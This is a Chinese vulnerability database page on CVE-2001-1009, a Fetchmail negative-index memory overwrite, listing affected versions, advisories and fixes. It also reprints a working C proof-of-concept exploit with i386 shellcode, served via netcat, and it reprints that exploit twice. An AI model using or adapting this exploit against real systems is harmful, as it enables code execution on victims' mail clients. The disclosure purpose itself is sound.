CVE-2001-1009
CVSS10.0
发布时间 :2001-08-31 00:00:00
修订时间 :2011-02-16 00:00:00
NMCOES    

[原文]Fetchmail (aka fetchmail-ssl) before 5.8.17 allows a remote malicious (1) IMAP server or (2) POP/POP3 server to overwrite arbitrary memory and possibly gain privileges via a negative index number as part of a response to a LIST request.


[CNNVD]Fetchmail POP3证书索引签名回复漏洞(CNNVD-200108-156)

        Fetchmail(也称为fetchmail-ssl) 5.8.17之前的版本存在漏洞。远程恶意(1)IMAP服务器,或(2)POP/POP3服务器可以借助负索引号作为LIST请求的部分响应覆盖任意内存,并且可能可以获取权限。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-264 [权限、特权与访问控制]

- CPE (受影响的平台与产品)

cpe:/a:fetchmail:fetchmail:5.2.1Fetchmail 5.2.1
cpe:/a:fetchmail:fetchmail:4.6.1Fetchmail 4.6.1
cpe:/a:fetchmail:fetchmail:5.5.3Fetchmail 5.5.3
cpe:/a:fetchmail:fetchmail:4.7.7Fetchmail 4.7.7
cpe:/a:fetchmail:fetchmail:4.7.6Fetchmail 4.7.6
cpe:/a:fetchmail:fetchmail:5.4.5Fetchmail 5.4.5
cpe:/a:fetchmail:fetchmail:5.0.0Fetchmail 5.0.0
cpe:/a:fetchmail:fetchmail:4.6.8Fetchmail 4.6.8
cpe:/a:fetchmail:fetchmail:5.5.0Fetchmail 5.5.0
cpe:/a:fetchmail:fetchmail:5.8.4Fetchmail 5.8.4
cpe:/a:fetchmail:fetchmail:4.5.3Fetchmail 4.5.3
cpe:/a:fetchmail:fetchmail:5.0.6Fetchmail 5.0.6
cpe:/a:fetchmail:fetchmail:5.1.0Fetchmail 5.1.0
cpe:/a:fetchmail:fetchmail:4.7.2Fetchmail 4.7.2
cpe:/a:fetchmail:fetchmail:4.6.0Fetchmail 4.6.0
cpe:/a:fetchmail:fetchmail:5.8.13Fetchmail 5.8.13
cpe:/a:fetchmail:fetchmail:4.5.2Fetchmail 4.5.2
cpe:/a:fetchmail:fetchmail:4.7.5Fetchmail 4.7.5
cpe:/a:fetchmail:fetchmail:4.6.9Fetchmail 4.6.9
cpe:/a:fetchmail:fetchmail:5.0.3Fetchmail 5.0.3
cpe:/a:fetchmail:fetchmail:5.9.0Fetchmail 5.9.0
cpe:/a:fetchmail:fetchmail:4.7.4Fetchmail 4.7.4
cpe:/a:fetchmail:fetchmail:5.6.0Fetchmail 5.6.0
cpe:/a:fetchmail:fetchmail:5.0.7Fetchmail 5.0.7
cpe:/a:fetchmail:fetchmail:4.5.1Fetchmail 4.5.1
cpe:/a:fetchmail:fetchmail:5.8.11Fetchmail 5.8.11
cpe:/a:fetchmail:fetchmail:5.2.0Fetchmail 5.2.0
cpe:/a:fetchmail:fetchmail:4.5.5Fetchmail 4.5.5
cpe:/a:fetchmail:fetchmail:4.6.2Fetchmail 4.6.2
cpe:/a:fetchmail:fetchmail:5.8.14Fetchmail 5.8.14
cpe:/a:fetchmail:fetchmail:5.3.0Fetchmail 5.3.0
cpe:/a:fetchmail:fetchmail:4.5.4Fetchmail 4.5.4
cpe:/a:fetchmail:fetchmail:5.8.5Fetchmail 5.8.5
cpe:/a:fetchmail:fetchmail:4.5.7Fetchmail 4.5.7
cpe:/a:fetchmail:fetchmail:4.6.4Fetchmail 4.6.4
cpe:/a:fetchmail:fetchmail:5.2.3Fetchmail 5.2.3
cpe:/a:fetchmail:fetchmail:4.5.8Fetchmail 4.5.8
cpe:/a:fetchmail:fetchmail:5.0.5Fetchmail 5.0.5
cpe:/a:fetchmail:fetchmail:4.5.6Fetchmail 4.5.6
cpe:/a:fetchmail:fetchmail:5.0.2Fetchmail 5.0.2
cpe:/a:fetchmail:fetchmail:5.5.5Fetchmail 5.5.5
cpe:/a:fetchmail:fetchmail:5.1.4Fetchmail 5.1.4
cpe:/a:fetchmail:fetchmail:5.5.6Fetchmail 5.5.6
cpe:/a:fetchmail:fetchmail:5.0.1Fetchmail 5.0.1
cpe:/a:fetchmail:fetchmail:4.7.3Fetchmail 4.7.3
cpe:/a:fetchmail:fetchmail:5.7.0Fetchmail 5.7.0
cpe:/a:fetchmail:fetchmail:5.2.8Fetchmail 5.2.8
cpe:/a:fetchmail:fetchmail:5.3.1Fetchmail 5.3.1
cpe:/a:fetchmail:fetchmail:5.3.8Fetchmail 5.3.8
cpe:/a:fetchmail:fetchmail:5.4.3Fetchmail 5.4.3
cpe:/a:fetchmail:fetchmail:4.6.3Fetchmail 4.6.3
cpe:/a:fetchmail:fetchmail:5.8.2Fetchmail 5.8.2
cpe:/a:fetchmail:fetchmail:5.7.4Fetchmail 5.7.4
cpe:/a:fetchmail:fetchmail:5.2.4Fetchmail 5.2.4
cpe:/a:fetchmail:fetchmail:5.8Fetchmail 5.8
cpe:/a:fetchmail:fetchmail:4.7.1Fetchmail 4.7.1
cpe:/a:fetchmail:fetchmail:4.6.6Fetchmail 4.6.6
cpe:/a:fetchmail:fetchmail:4.6.5Fetchmail 4.6.5
cpe:/a:fetchmail:fetchmail:5.5.2Fetchmail 5.5.2
cpe:/a:fetchmail:fetchmail:4.6.7Fetchmail 4.6.7
cpe:/a:fetchmail:fetchmail:5.4.4Fetchmail 5.4.4
cpe:/a:fetchmail:fetchmail:5.0.8Fetchmail 5.0.8
cpe:/a:fetchmail:fetchmail:5.3.3Fetchmail 5.3.3
cpe:/a:fetchmail:fetchmail:4.7.0Fetchmail 4.7.0
cpe:/a:fetchmail:fetchmail:5.0.4Fetchmail 5.0.4
cpe:/a:fetchmail:fetchmail:5.8.3Fetchmail 5.8.3
cpe:/a:fetchmail:fetchmail:5.7.2Fetchmail 5.7.2
cpe:/a:fetchmail:fetchmail:5.2.7Fetchmail 5.2.7
cpe:/a:fetchmail:fetchmail:5.8.6Fetchmail 5.8.6
cpe:/a:fetchmail:fetchmail:5.8.1Fetchmail 5.8.1
cpe:/a:fetchmail:fetchmail:5.4.0Fetchmail 5.4.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1009
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-1009
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200108-156
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/3166
(VENDOR_ADVISORY)  BID  3166
http://www.securityfocus.com/bid/3164
(VENDOR_ADVISORY)  BID  3164
http://www.redhat.com/support/errata/RHSA-2001-103.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2001:103
http://www.linuxsecurity.com/advisories/other_advisory-1555.html
(VENDOR_ADVISORY)  ENGARDE  ESA-20010816-01
http://archives.neohapsis.com/archives/bugtraq/2001-08/0118.html
(VENDOR_ADVISORY)  BUGTRAQ  20010809 Fetchmail security advisory
http://www.novell.com/linux/security/advisories/2001_026_fetchmail_txt.html
(UNKNOWN)  SUSE  SuSE-SA:2001:026
http://www.linux-mandrake.com/en/security/2001/MDKSA-2001-072.php3
(UNKNOWN)  MANDRAKE  MDKSA-2001:072
http://www.iss.net/security_center/static/6965.php
(UNKNOWN)  XF  fetchmail-signed-integer-index(6965)
http://www.debian.org/security/2001/dsa-071
(UNKNOWN)  DEBIAN  DSA-071
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000419
(UNKNOWN)  CONECTIVA  CLA-2001:419

- 漏洞信息

Fetchmail POP3证书索引签名回复漏洞
危急 输入验证
2001-08-31 00:00:00 2005-10-20 00:00:00
远程  
        Fetchmail(也称为fetchmail-ssl) 5.8.17之前的版本存在漏洞。远程恶意(1)IMAP服务器,或(2)POP/POP3服务器可以借助负索引号作为LIST请求的部分响应覆盖任意内存,并且可能可以获取权限。

- 公告与补丁

        A fixed version has been made available.
        Various vendors have also released fixed packages:
        Eric Raymond Fetchmail 5.3.8
        
        Eric Raymond Fetchmail 5.4 .0
        
        Eric Raymond Fetchmail 5.5.2
        
        
        Eric Raymond Fetchmail 5.7.4
        
        Eric Raymond Fetchmail 5.8 .0
        
        Eric Raymond Fetchmail 5.8.1
        
        Eric Raymond Fetchmail 5.8.10
        
        Eric Raymond Fetchmail 5.8.11
        
        Eric Raymond Fetchmail 5.8.12
        
        Eric Raymond Fetchmail 5.8.13
        
        Eric Raymond Fetchmail 5.8.14
        
        Eric Raymond Fetchmail 5.8.15
        
        Eric Raymond Fetchmail 5.8.16
        
        Eric Raymond Fetchmail 5.8.2
        
        Eric Raymond Fetchmail 5.8.3
        
        Eric Raymond Fetchmail 5.8.4
        
        Eric Raymond Fetchmail 5.8.5
        
        Eric Raymond Fetchmail 5.8.6
        

- 漏洞信息 (21064)

Fetchmail 5.x POP3 Reply Signed Integer Index Vulnerability (EDBID:21064)
unix remote
2001-08-09 Verified
0 Salvatore Sanfilippo -antirez-
N/A [点击下载]
source: http://www.securityfocus.com/bid/3164/info

Fetchmail is a unix utility for downloading email from mail servers via POP3.

Fetchmail contains a vulnerability that may allow for remote attackers to gain access to client systems. The vulnerability has to do with the use of a remotely supplied signed integer value as the index to an array when writing data to memory.

It is be possible for attackers to overwrite critical variables in memory with arbitrary values if the target client's POP3 server can be impersonated. Successful exploitation can lead to the exectution of arbitrary code on the client host. 

/* fetchmail proof of concepts i386 exploit
 * Copyright (C) 2001 Salvatore Sanfilippo <antirez@invece.org>
 * Code under the GPL license.
 *
 * Usage: ./a.out | nc -l -p 3333
 * fetchmail localhost -P 3333 -p POP3
 *
 * This is a bad exploit with offset carefully selected
 * to work in my own system. It will probably not work in
 * your system if you don't modify RETR_OFFSET and SHELL_PTR,
 * but you may try to set the SHELL_PTR to 0xAAAAAAAA
 * and use gdb to obtain the proof that your fetchmail is vulnerable
 * without to exploit it.
 * Or just read the code in pop3.c.
 *
 * To improve the exploit portability you may put the shellcode inside
 * one of the static char buffers, grep 'static char' *.c.
 *
 * Tested on fetchmail 5.8.15 running on Linux 2.4.6
 *
 * On success you should see the ls output.
 */

#include <stdio.h>

#define MESSAGES 10
#define RETR_OFFSET -20
#define SHELL_PTR 0xbfffba94

int main(void)
{
	int ish = SHELL_PTR;
	int ret_offset = -10;
	char shellcode[] = /* take the shellcode multiple of 4 in size */
	"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
	"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
	"\x80\xe8\xdc\xff\xff\xff/bin/ls\0\0";
	int *sc = (int*) shellcode;
	int noop = 0x90909090;
	int i;

	/* +OK for user and password, than report the number of messages */
	printf("+OK\r\n+OK\r\n+OK\r\n+OK %d 0\r\n+OK 0\r\n+OK\r\n", MESSAGES);
	/* Overwrite the RET pointer */
	for (i = ret_offset-20; i < ret_offset+20; i++)
		printf("%d %d\r\n", i, ish);
	/* Put some NOP */
	for (i = 1; i < 21; i++)
		printf("%d %d\r\n", i, noop);
	/* Put the shell code in the buffer */
	for (i = 21; i < 21+(sizeof(shellcode)/4); i++)
		printf("%d %d\r\n", i, *sc++);
	printf(".\r\n"); /* POP data term */
	return 0;
}
		

- 漏洞信息 (21066)

Fetchmail 5.x IMAP Reply Signed Integer Index Vulnerability (EDBID:21066)
unix remote
2001-08-09 Verified
0 Sanfillipo antirez
N/A [点击下载]
source: http://www.securityfocus.com/bid/3166/info

Fetchmail is a unix utility for downloading email from mail servers via POP3 and IMAP.

Fetchmail contains a vulnerability that may allow for remote attackers to gain access to client systems. The vulnerability has to do with the use of a remotely supplied signed integer value as the index to an array when writing data to memory.

It is be possible for attackers to overwrite critical variables in memory with arbitrary values if the target client's IMAP server can be impersonated. Successful exploitation can lead to the exectution of arbitrary code on the client host.

/* fetchmail proof of concepts i386 exploit
 * Copyright (C) 2001 Salvatore Sanfilippo <antirez@invece.org>
 * Code under the GPL license.
 *
 * Usage: ./a.out | nc -l -p 3333
 * fetchmail localhost -P 3333 -p POP3
 *
 * This is a bad exploit with offset carefully selected
 * to work in my own system. It will probably not work in
 * your system if you don't modify RETR_OFFSET and SHELL_PTR,
 * but you may try to set the SHELL_PTR to 0xAAAAAAAA
 * and use gdb to obtain the proof that your fetchmail is vulnerable
 * without to exploit it.
 * Or just read the code in pop3.c.
 *
 * To improve the exploit portability you may put the shellcode inside
 * one of the static char buffers, grep 'static char' *.c.
 *
 * Tested on fetchmail 5.8.15 running on Linux 2.4.6
 *
 * On success you should see the ls output.
 */

#include <stdio.h>

#define MESSAGES 10
#define RETR_OFFSET -20
#define SHELL_PTR 0xbfffba94

int main(void)
{
	int ish = SHELL_PTR;
	int ret_offset = -10;
	char shellcode[] = /* take the shellcode multiple of 4 in size */
	"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
	"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
	"\x80\xe8\xdc\xff\xff\xff/bin/ls\0\0";
	int *sc = (int*) shellcode;
	int noop = 0x90909090;
	int i;

	/* +OK for user and password, than report the number of messages */
	printf("+OK\r\n+OK\r\n+OK\r\n+OK %d 0\r\n+OK 0\r\n+OK\r\n", MESSAGES);
	/* Overwrite the RET pointer */
	for (i = ret_offset-20; i < ret_offset+20; i++)
		printf("%d %d\r\n", i, ish);
	/* Put some NOP */
	for (i = 1; i < 21; i++)
		printf("%d %d\r\n", i, noop);
	/* Put the shell code in the buffer */
	for (i = 21; i < 21+(sizeof(shellcode)/4); i++)
		printf("%d %d\r\n", i, *sc++);
	printf(".\r\n"); /* POP data term */
	return 0;
}		

- 漏洞信息

10329
Fetchmail IMAP Server Negative Index Privilege Escalation
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Vendor Verified

- 漏洞描述

- 时间线

2001-08-10 Unknow
2001-08-10 Unknow

- 解决方案

Upgrade to version 5.8.17 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Fetchmail IMAP Reply Signed Integer Index Vulnerability
Input Validation Error 3166
Yes No
2001-08-09 12:00:00 2009-07-11 07:56:00
Discovered by Salvatore Sanfillipo antirez <antirez@invece.org>.

- 受影响的程序版本

Eric Raymond Fetchmail 5.8.16
Eric Raymond Fetchmail 5.8.15
Eric Raymond Fetchmail 5.8.14
Eric Raymond Fetchmail 5.8.13
Eric Raymond Fetchmail 5.8.12
Eric Raymond Fetchmail 5.8.11
Eric Raymond Fetchmail 5.8.10
Eric Raymond Fetchmail 5.8.9
Eric Raymond Fetchmail 5.8.8
Eric Raymond Fetchmail 5.8.7
Eric Raymond Fetchmail 5.8.6
- Apple Mac OS X 10.1
Eric Raymond Fetchmail 5.8.5
Eric Raymond Fetchmail 5.8.4
Eric Raymond Fetchmail 5.8.3
Eric Raymond Fetchmail 5.8.2
Eric Raymond Fetchmail 5.8.1
Eric Raymond Fetchmail 5.8 .0
+ S.u.S.E. Linux 7.2
Eric Raymond Fetchmail 5.7.4
- Mandriva Linux Mandrake 8.0
Eric Raymond Fetchmail 5.7.3
Eric Raymond Fetchmail 5.7.2
Eric Raymond Fetchmail 5.7.1
- Debian Linux 2.3
Eric Raymond Fetchmail 5.7
Eric Raymond Fetchmail 5.6.8
Eric Raymond Fetchmail 5.6.7
Eric Raymond Fetchmail 5.6.6
Eric Raymond Fetchmail 5.6.5
+ S.u.S.E. Linux 7.1 x86
+ S.u.S.E. Linux 7.1 sparc
+ S.u.S.E. Linux 7.1 ppc
+ S.u.S.E. Linux 7.1 alpha
+ S.u.S.E. Linux 7.1
Eric Raymond Fetchmail 5.6.4
Eric Raymond Fetchmail 5.6.3
Eric Raymond Fetchmail 5.6.2
Eric Raymond Fetchmail 5.6.1
Eric Raymond Fetchmail 5.6
Eric Raymond Fetchmail 5.5.6
Eric Raymond Fetchmail 5.5.5
- Conectiva Linux 6.0
- Conectiva Linux 5.1
- Conectiva Linux 5.0
- Conectiva Linux graficas
- Conectiva Linux ecommerce
Eric Raymond Fetchmail 5.5.4
Eric Raymond Fetchmail 5.5.3
Eric Raymond Fetchmail 5.5.2
Eric Raymond Fetchmail 5.5.1
Eric Raymond Fetchmail 5.5
+ Cobalt Qube 3.0
- Immunix Immunix OS 7.0 beta
- Immunix Immunix OS 7.0
Eric Raymond Fetchmail 5.4.5
Eric Raymond Fetchmail 5.4.4
Eric Raymond Fetchmail 5.4.3
Eric Raymond Fetchmail 5.4.2
Eric Raymond Fetchmail 5.4.1
Eric Raymond Fetchmail 5.4 .0
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Server 3.1
+ Caldera OpenLinux Workstation 3.1.1
+ Caldera OpenLinux Workstation 3.1
+ EnGarde Secure Linux 1.0.1
- Guardian Digital Engarde Secure Linux 1.0.1
Eric Raymond Fetchmail 5.8.17
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Server 3.1
+ Caldera OpenLinux Workstation 3.1.1
+ Caldera OpenLinux Workstation 3.1

- 不受影响的程序版本

Eric Raymond Fetchmail 5.8.17
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Server 3.1
+ Caldera OpenLinux Workstation 3.1.1
+ Caldera OpenLinux Workstation 3.1

- 漏洞讨论

Fetchmail is a unix utility for downloading email from mail servers via POP3 and IMAP.

Fetchmail contains a vulnerability that may allow for remote attackers to gain access to client systems. The vulnerability has to do with the use of a remotely supplied signed integer value as the index to an array when writing data to memory.

It is be possible for attackers to overwrite critical variables in memory with arbitrary values if the target client's IMAP server can be impersonated. Successful exploitation can lead to the exectution of arbitrary code on the client host.

- 漏洞利用

Salvatore Sanfillipo antirez &lt;antirez@invece.org&gt; published proof of concept code.

- 解决方案

A fixed version has been made available.

Various vendors have also released fixed packages:


Eric Raymond Fetchmail 5.4 .0

Eric Raymond Fetchmail 5.5.2

Eric Raymond Fetchmail 5.7.4

Eric Raymond Fetchmail 5.8 .0

Eric Raymond Fetchmail 5.8.1

Eric Raymond Fetchmail 5.8.10

Eric Raymond Fetchmail 5.8.11

Eric Raymond Fetchmail 5.8.12

Eric Raymond Fetchmail 5.8.13

Eric Raymond Fetchmail 5.8.14

Eric Raymond Fetchmail 5.8.15

Eric Raymond Fetchmail 5.8.16

Eric Raymond Fetchmail 5.8.2

Eric Raymond Fetchmail 5.8.3

Eric Raymond Fetchmail 5.8.4

Eric Raymond Fetchmail 5.8.5

Eric Raymond Fetchmail 5.8.6

Eric Raymond Fetchmail 5.8.7

Eric Raymond Fetchmail 5.8.8

Eric Raymond Fetchmail 5.8.9

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站